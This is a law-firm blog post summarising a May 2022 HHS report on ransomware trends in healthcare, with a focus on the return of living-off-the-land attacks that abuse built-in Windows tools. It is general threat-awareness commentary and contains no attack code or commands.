Skip to content

Discerning Data

  • About Us
  • Additional Resources
  • Contact Us

DISCERNING DATA

A Faegre Drinker Blog Covering the Latest in Privacy, Cybersecurity and Data Strategy
  • Privacy
  • Cybersecurity
  • Data Strategy
  • Disruptionware

HHS Ransomware Report Details Revival of Dangerous LOTL Cyberattack

Share

On May 5, 2022, the U.S. Department of Health and Human Services (HHS) issued a report entitled “Ransomware Trends in the HPH Sector” (HHS Report) that reviewed key cybersecurity threats and trends affecting the U.S. healthcare sector.

Key takeaways from the HHS Report include:

  • The five most active ransomware groups that are focusing on selling their Ransomware as a Service platform are Lockbit, Conti, SunCrypt, ALPHV/Blackcat and Hive.
  • Certain ransomware groups are taking a political stance in the Russia- Ukraine conflict, including the ransomware gang Conti, which has openly sided with the Russian government.
  • There has been a noticeable decrease in the time it takes for the malware launched by these gangs to infect a victim’s systems – specifically, ransomware attacks that previously took five days to fully infect a system now can take less than two days.

The HHS Report also discusses the troubling return to prominence of the use by malicious actors of the “Living off the Land” cyberattack (LOTL). LOTL attacks first were utilized with frequency in approximately 2013, and they involve threat actors who use system tools supplied by the host operating system – which are normally used for legitimate purposes – to help launch ransomware and other malicious cyberattacks. LOTL are considered “fileless” attacks and, because of the fact that they utilize tools from the host operating system, they are much more likely than a traditional malware attack to go undetected before doing substantial damage.

LOTL attacks focus on threat techniques that are not typically written to a hard drive. They focus on tools that stay in “volatile memory.” When data is written to a hard drive, it remains resident even after the computer or device is turned off. The specific data remains on the hard drive once the device is turned back on. Volatile memory, however, can only store data during the time when a device is powered and turned “on.” Once the device is powered off, the data stored in the volatile memory is generally lost and unrecoverable to the average user.

According to the HHS Report, malicious actors involved in perpetrating LOTL attacks are increasingly leveraging legitimate operating system tools during ransomware intrusions. The tools that are utilized include:

  • Remote Access Tools
  • Encryption Tools
  • File Transfer Tools
  • Microsoft Sysinternals Utilities
  • Open-Source Tools

Many of the tools noted below that are used in LOTL attacks are organic to a Windows-based environment. These include:

  • CMD.exe
  • Powershell
  • Task Scheduler
  • MSHTA
  • Sysinternals
  • Team Viewer
  • Kaseya
  • LogMeln

LOTL attacks subvert these internal tools and use them nefariously as they circumvent the victim network. The attacks are difficult to detect because the tools themselves are not malignant per se. They are developed by the software designer to help a user in the Windows environment. LOTL attacks are dangerous because the malicious actors who use them are finding ways to take these internal, seemingly benign, processes and use them as part of their attack matrix as they move around the victim system or network.

Threat actors benefit from LOTL attacks because the attacks are less likely to flag and alert endpoint detection tools. In addition, LOTL attacks provide better camouflage to threat actors, allowing them to blend in with normal administrative tasks while performing reconnaissance on the targeted systems.

The return to prominence of LOTL attacks is a potentially dangerous threat which businesses should consider and plan for when working on their overall cyber hygiene and cybersecurity defenses.

About the Author: Jason G. Weiss

Jason G. Weiss leverages a past career as a cybersecurity and computer forensics Supervisory Special Agent with more than 22 years of decorated service at the FBI to guide clients through the complex and high-stakes issues associated with cybersecurity incident preparedness and response and compliance. View Jason's full bio on the Faegre Drinker website.

About the Author: Peter Baldwin

Peter Baldwin draws on his experience as a former federal prosecutor to counsel clients facing government investigations and cybersecurity issues. View Peter's full bio on the Faegre Drinker website.

About the Author: Grayson Harbour

Grayson Harbour is an associate in the firm's Labor & Employment practice group. Read Grayson's full bio on the Faegre Drinker website.

About the Author: Jane Blaney

Jane Blaney assists clients seeking solutions related to insurance matters, with concentrated knowledge in health insurance, health insurance regulation and technology services. View Jane's full bio on the Faegre Drinker website.

Receive Email Alerts to New Articles

SUBSCRIBE

May 16, 2022
Written by: Jason G. Weiss, Peter Baldwin, Grayson Harbour and Jane Blaney
Category: Cybersecurity
Tags: cyberattack, HHS, Ransomware as a Service

Post navigation

Previous Previous post: What Is Algorithmic Bias? Why Is It Important? – Faegre Drinker on Law and Technology Podcast
Next Next post: Russia, Cybersecurity & Government Contracting – Faegre Drinker on Law and Technology Podcast

Search the Blog

Sign Up for Email Alerts

PODCASTS

Faegre Drinker on Law and Technology

©2022 Faegre Drinker Biddle & Reath LLP. All Rights Reserved. Lawyer Advertising.

  • About Us
  • Additional Resources
  • Contact Us
We use cookies to improve your experience with our website. By browsing our site, you are agreeing to the use of cookies. For more information about how we use cookies, please review our privacy policy and cookie policy. OK
Privacy & Cookies Policy

Privacy Overview

This website uses cookies to improve your experience while you navigate through the website. Out of these, the cookies that are categorized as necessary are stored on your browser as they are essential for the working of basic functionalities of the website. We also use third-party cookies that help us analyze and understand how you use this website. These cookies will be stored in your browser only with your consent. You also have the option to opt-out of these cookies. But opting out of some of these cookies may affect your browsing experience.
Necessary
Always Enabled
Necessary cookies are absolutely essential for the website to function properly. This category only includes cookies that ensures basic functionalities and security features of the website. These cookies do not store any personal information.
Non-necessary
Any cookies that may not be particularly necessary for the website to function and is used specifically to collect user personal data via analytics, ads, other embedded contents are termed as non-necessary cookies. It is mandatory to procure user consent prior to running these cookies on your website.
SAVE & ACCEPT